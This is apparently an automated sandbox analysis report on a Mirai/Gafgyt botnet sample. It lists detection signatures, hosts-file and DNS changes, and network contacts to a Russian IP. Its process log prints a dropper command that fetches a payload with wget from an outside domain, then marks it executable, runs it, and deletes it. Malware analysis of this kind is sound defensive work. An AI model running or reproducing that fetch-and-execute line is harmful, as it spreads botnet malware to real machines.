Analysis Overview
SHA256
2d5207861f9e0ed521792b82920b218535499c8a02932b484f0a9df375992986
Threat Level: Known bad
The file 65e8a78d64704cc9af4d19ef090ed81e was found to be: Known bad.
Malicious Activity Summary
Detect Mirai Payload
Detected Gafgyt Variant
Detected x86corona Mirai Variant
Gafgyt family
Mirai family
Mirai_x86corona family
Modifies hosts file
Writes DNS configuration
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2022-04-11 08:06
Signatures
Detect Mirai Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detected Gafgyt Variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detected x86corona Mirai Variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gafgyt family
Mirai family
Mirai_x86corona family
Analysis: behavioral1
Detonation Overview
Submitted
2022-04-11 08:06
Reported
2022-04-11 08:11
Platform
ubuntu1804-amd64-en-20211208
Max time kernel
10682s
Max time network
142s
Command Line
Signatures
Modifies hosts file
| Description | Indicator | Process | Target |
| /etc/hosts | /etc/hosts | /usr/bin/wget | N/A |
Writes DNS configuration
| Description | Indicator | Process | Target |
| /etc/resolv.conf | /etc/resolv.conf | /usr/bin/wget | N/A |
Processes
./65e8a78d64704cc9af4d19ef090ed81e
[./65e8a78d64704cc9af4d19ef090ed81e]
/bin/sh
[/bin/sh -c wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf .....]
/usr/bin/wget
[wget -q http://gay.energy/.../vivid -O .....]
/bin/chmod
[chmod 777 .....]
./.....
[./.....]
/bin/sh
[/bin/sh ./.....]
/bin/rm
[rm -rf .....]
Network
| Country | Destination | Domain | Proto |
| RU | 45.153.231.64:666 | tcp | |
| US | 1.1.1.1:53 | gay.energy | udp |
| US | 1.1.1.1:53 | gay.energy | udp |
| RU | 45.153.231.64:666 | tcp | |
| RU | 45.153.231.64:666 | tcp | |
| RU | 45.153.231.64:666 | tcp | |
| RU | 45.153.231.64:666 | tcp | |
| RU | 45.153.231.64:666 | tcp | |
| RU | 45.153.231.64:666 | tcp | |
| RU | 45.153.231.64:666 | tcp | |
| RU | 45.153.231.64:666 | tcp | |
| RU | 45.153.231.64:666 | tcp |